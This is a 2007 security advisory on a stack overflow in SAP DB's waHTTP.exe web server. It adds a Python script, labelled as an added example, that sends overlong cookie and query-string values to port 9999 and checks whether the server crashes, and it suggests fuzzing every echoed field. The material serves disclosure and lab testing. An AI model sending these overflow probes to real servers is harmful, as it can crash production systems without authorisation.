Sunday, July 08, 2007

[NEWS] SAP DB Web Server Stack Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - - - - - - - -

SAP DB Web Server Stack Overflow
------------------------------------------------------------------------


SUMMARY

SAP DB is "an open source database server sponsored by SAP AG that
provides a series of web tools to administer database servers via web
browsers. These tools can be integrated into third-party web servers such
as IIS, or run on its own web server which by default is installed to TCP
Port 9999".

When installed with its own web server, SAP DB's waHTTP.exe process listens
on TCP port 9999. This web server has been found to contain a remotely
exploitable stack-based overflow.

DETAILS

By requesting:
http://target:9999/webdbm?Event=DBM_INTERN_TEST&Action=REFRESH

and inspecting the 200 response, we can see what this request does: the
server echoes back its own view of the request (URI, query string, method
and every HTTP header it recognises, including the SID cookie value):

<body topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
background=/WARoot/Images/tatami.gif>
<a href="javascript:parent.GotoWebDBMURL(this,
'Event=DBM_INTERN_TEST&Action=REFRESH')">Test</a><table
style="font-family:courier new,monospace; font-size:8pt;" border=1
cellspacing=0 cellpadding=1>
<tr><td>sapdbwa_GetRequestURI </td><td>/webdbm </td></tr>
<tr><td>sapdbwa_GetIfModifiedSince </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetQueryString
</td><td>Event=DBM_INTERN_TEST&Action=REFRESH </td></tr>
<tr><td>sapdbwa_GetPathInfo </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetMethod </td><td>GET </td></tr>
<tr><td>sapdbwa_GetContentType </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetContentLength </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetPathTranslated </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetServerName </td><td>NULL </td></tr>
<tr><td>AUTH_TYPE </td><td>NULL </td></tr>
<tr><td>CONTENT_LENGTH </td><td>NULL </td></tr>
<tr><td>CONTENT_TYPE </td><td>NULL </td></tr>
<tr><td>GATEWAY_INTERFACE </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT </td><td>*/* </td></tr>
<tr><td>PATH_INFO </td><td>NULL </td></tr>
<tr><td>QUERY_STRING </td><td>NULL </td></tr>
<tr><td>REMOTE_ADDR </td><td>NULL </td></tr>
<tr><td>REMOTE_HOST </td><td>NULL </td></tr>
<tr><td>REMOTE_USER </td><td>NULL </td></tr>
<tr><td>REQUEST_METHOD </td><td>NULL </td></tr>
<tr><td>SCRIPT_NAME </td><td>NULL </td></tr>
<tr><td>SERVER_NAME </td><td>NULL </td></tr>
<tr><td>SERVER_PORT </td><td>NULL </td></tr>
<tr><td>SERVER_PROTOCOL </td><td>NULL </td></tr>
<tr><td>SERVER_SOFTWARE </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT </td><td>*/* </td></tr>
<tr><td>HTTP_ACCEPT_CHARSET </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT_ENCODING </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT_LANGUAGE </td><td>NULL </td></tr>
<tr><td>HTTP_ACCEPT_RANGES </td><td>NULL </td></tr>
<tr><td>HTTP_AGE </td><td>NULL </td></tr>
<tr><td>HTTP_ALLOW </td><td>NULL </td></tr>
<tr><td>HTTP_AUTHORIZATION </td><td>NULL </td></tr>
<tr><td>HTTP_CACHE_CONTROL </td><td>NULL </td></tr>
<tr><td>HTTP_CONNECTION </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_ENCODING </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_LANGUAGE </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_LENGTH </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_LOCATION </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_MD5 </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_RANGE </td><td>NULL </td></tr>
<tr><td>HTTP_CONTENT_TYPE </td><td>NULL </td></tr>
<tr><td>HTTP_DATE </td><td>NULL </td></tr>
<tr><td>HTTP_ETAG </td><td>NULL </td></tr>
<tr><td>HTTP_EXPECT </td><td>NULL </td></tr>
<tr><td>HTTP_EXPIRES </td><td>NULL </td></tr>
<tr><td>HTTP_FROM </td><td>NULL </td></tr>
<tr><td>HTTP_HOST </td><td>localhost </td></tr>
<tr><td>HTTP_IF_MATCH </td><td>NULL </td></tr>
<tr><td>HTTP_IF_MODIFIED_SINCE </td><td>NULL </td></tr>
<tr><td>HTTP_IF_NONE_MATCH </td><td>NULL </td></tr>
<tr><td>HTTP_IF_RANGE </td><td>NULL </td></tr>
<tr><td>HTTP_IF_UNMODIFIED_SINCE </td><td>NULL </td></tr>
<tr><td>HTTP_LAST_MODIFIED </td><td>NULL </td></tr>
<tr><td>HTTP_LOCATION </td><td>NULL </td></tr>
<tr><td>HTTP_MAX_FORWARDS </td><td>NULL </td></tr>
<tr><td>HTTP_PRAGMA </td><td>NULL </td></tr>
<tr><td>HTTP_PROXY_AUTHENTICATE </td><td>NULL </td></tr>
<tr><td>HTTP_PROXY_AUTHORIZATION </td><td>NULL </td></tr>
<tr><td>HTTP_RANGE </td><td>NULL </td></tr>
<tr><td>HTTP_REFERER </td><td>NULL </td></tr>
<tr><td>HTTP_RETRY_AFTER </td><td>NULL </td></tr>
<tr><td>HTTP_SERVER </td><td>NULL </td></tr>
<tr><td>HTTP_TE </td><td>NULL </td></tr>
<tr><td>HTTP_TRAILER </td><td>NULL </td></tr>
<tr><td>HTTP_TRANSFER_ENCODING </td><td>NULL </td></tr>
<tr><td>HTTP_UPGRADE </td><td>NULL </td></tr>
<tr><td>HTTP_USER_AGENT </td><td>NULL </td></tr>
<tr><td>HTTP_VARY </td><td>NULL </td></tr>
<tr><td>HTTP_VIA </td><td>NULL </td></tr>
<tr><td>HTTP_WARNING </td><td>NULL </td></tr>
<tr><td>HTTP_WWW_AUTHENTICATE </td><td>NULL </td></tr>
<tr><td>HTTP_COOKIE </td><td>SID=E63A7F73B20A5021442BAF3C8F70B97A
</td></tr>
<tr><td>HTTP_SESSION_ID </td><td>NULL </td></tr>
<tr><td>Event </td><td>DBM_INTERN_TEST </td></tr>
<tr><td>Action </td><td>REFRESH </td></tr>
</table>
</body>

By making the same request again, but replacing the SID cookie value with an
overly long string (or, if no cookie is present, simply adding a Cookie
header to the request), we can cause a stack-based overflow within
waHTTP.exe.

The same overflow can also be reached through numerous other fields.

Taking sapdbwa_GetQueryString as an example, we can simply pass an
additional parameter by appending an ampersand followed by a long string to
the query string.
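The following script is an added example, not code from the advisory or from NGS: it parses the DBM_INTERN_TEST table shown above (so you can see which request fields waHTTP.exe actually parsed and echoed), builds the two overlong-field requests the advisory describes (Cookie header and an extra query-string parameter), and reports whether the server still answers afterwards. The host address, the padding length and the "server stops answering" crash signature are assumptions for a lab test, not values from the advisory; the embedded sample response is an abbreviated copy of the table above.

```python
"""Probe SAP DB's waHTTP.exe (TCP 9999) for the overlong-field stack overflow
described in the advisory. Added example; host, padding length and the
crash heuristic are assumptions, not advisory data."""
import re
import socket

TARGET_HOST = "192.0.2.10"   # assumed lab host (RFC 5737 documentation range)
TARGET_PORT = 9999           # default waHTTP port per the advisory
PROBE_LEN = 4096             # assumed padding length; raise it if nothing happens

BASE_QUERY = "Event=DBM_INTERN_TEST&Action=REFRESH"

# Abbreviated, constructed copy of the DBM_INTERN_TEST response from the advisory.
SAMPLE_BODY = """<table border=1>
<tr><td>sapdbwa_GetRequestURI </td><td>/webdbm </td></tr>
<tr><td>sapdbwa_GetQueryString
</td><td>Event=DBM_INTERN_TEST&Action=REFRESH </td></tr>
<tr><td>sapdbwa_GetPathInfo </td><td>NULL </td></tr>
<tr><td>sapdbwa_GetMethod </td><td>GET </td></tr>
<tr><td>HTTP_HOST </td><td>localhost </td></tr>
<tr><td>HTTP_COOKIE </td><td>SID=E63A7F73B20A5021442BAF3C8F70B97A
</td></tr>
<tr><td>Event </td><td>DBM_INTERN_TEST </td></tr>
</table>"""

# One table row; re.S lets the lazy groups span the line-wrapped cells.
ROW_RE = re.compile(r"<tr><td>(.*?)\s*</td><td>(.*?)\s*</td></tr>", re.S)


def parse_intern_test(body: str) -> dict:
    """Map each echoed field name to its value; 'NULL' becomes None."""
    fields = {}
    for name, value in ROW_RE.findall(body):
        value = " ".join(value.split())          # collapse wrapped whitespace
        fields[name.strip()] = None if value == "NULL" else value
    return fields


def echoed_fields(fields: dict) -> list:
    """Names the server populated, i.e. the inputs it parsed from our request."""
    return sorted(k for k, v in fields.items() if v is not None)


def build_request(path: str, query: str, headers: dict) -> bytes:
    """Minimal HTTP/1.0 GET; waHTTP is a small embedded server, keep it simple."""
    lines = [f"GET {path}?{query} HTTP/1.0", f"Host: {TARGET_HOST}"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def cookie_probe(length: int = PROBE_LEN) -> bytes:
    """Advisory's first trigger: an overlong SID cookie value."""
    return build_request("/webdbm", BASE_QUERY, {"Cookie": "SID=" + "A" * length})


def query_probe(length: int = PROBE_LEN) -> bytes:
    """Advisory's second trigger: an extra overlong parameter appended with '&'."""
    return build_request("/webdbm", BASE_QUERY + "&" + "A" * length, {})


def server_answers(req: bytes, timeout: float = 5.0) -> bool:
    """Send one probe; False (reset or silence) is the assumed crash signature.
    A normal response only shows this field did not crash at this length."""
    try:
        with socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=timeout) as s:
            s.sendall(req)
            return bool(s.recv(1024))
    except (socket.timeout, ConnectionResetError, ConnectionRefusedError):
        return False


if __name__ == "__main__":
    print("fields echoed by DBM_INTERN_TEST:", echoed_fields(parse_intern_test(SAMPLE_BODY)))
    for name, probe in (("cookie", cookie_probe()), ("query", query_probe())):
        print(f"{name} probe: server still answering = {server_answers(probe)}")
```

Run the baseline DBM_INTERN_TEST request first and feed its body to parse_intern_test: every field that comes back non-NULL is a parsed input and therefore a candidate for the same overlong-value test, which is what the advisory means by "numerous other fields". Re-check reachability between probes, since a crash of waHTTP.exe takes the whole port down.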


ADDITIONAL INFORMATION

The information has been provided by <mailto:mark@ngssoftware.com> Mark
Litchfield.

========================================



DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
